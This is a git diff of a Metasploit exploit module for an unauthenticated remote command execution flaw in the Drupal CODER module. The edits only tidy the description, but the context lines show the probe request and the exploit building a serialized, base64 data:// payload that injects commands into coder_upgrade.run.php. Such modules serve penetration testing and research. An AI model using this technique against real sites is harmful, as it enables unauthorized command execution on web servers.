@@ -12,16 +12,17 @@ def initialize(info={})
12
12
super ( update_info ( info ,
13
13
'Name' => 'Drupal CODER Module Remote Command Execution' ,
14
14
'Description' => %q{
15
- This module exploits a Remote Command Execution vulnerability in
16
- Drupal CODER Module. Unauthenticated users can execute arbitrary command
17
- under the context of the web server user.
15
+ This module exploits a Remote Command Execution vulnerability in the
16
+ Drupal CODER Module. Unauthenticated users can execute arbitrary
17
+ commands under the context of the web server user.
18
18
19
- CODER module doesn't sufficiently validate user inputs in a script file
20
- that has the php extension. A malicious unauthenticated user can make
21
- requests directly to this file to execute arbitrary command .
22
- The module does not need to be enabled for this to be exploited
19
+ The CODER module doesn't sufficiently validate user inputs in a script
20
+ file that has the PHP extension. A malicious unauthenticated user can
21
+ make requests directly to this file to execute arbitrary commands .
22
+ The module does not need to be enabled for this to be exploited.
23
23
24
- This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
24
+ This module was tested against CODER 2.5 with Drupal 7.5 installed on
25
+ Ubuntu Server.
25
26
} ,
26
27
'License' => MSF_LICENSE ,
27
28
'Author' =>
@@ -64,6 +65,7 @@ def check
64
65
'method' => 'GET' ,
65
66
'uri' => normalize_uri ( target_uri . path , 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php' ) ,
66
67
)
68
+
67
69
if res && res . body . include? ( 'file parameter is not setNo path to parameter file' )
68
70
Exploit ::CheckCode ::Appears
69
71
else
@@ -84,7 +86,9 @@ def exploit
84
86
p << ':"-v;'
85
87
p << payload . encoded
86
88
p << ' #";s:4:"name";s:4:"test";}}}'
89
+
87
90
payload = "data://text/plain;base64,#{ Rex ::Text . encode_base64 ( p ) } "
91
+
88
92
send_request_cgi (
89
93
'method' => 'GET' ,
90
94
'uri' => normalize_uri ( target_uri . path , 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php' ) ,
0 commit comments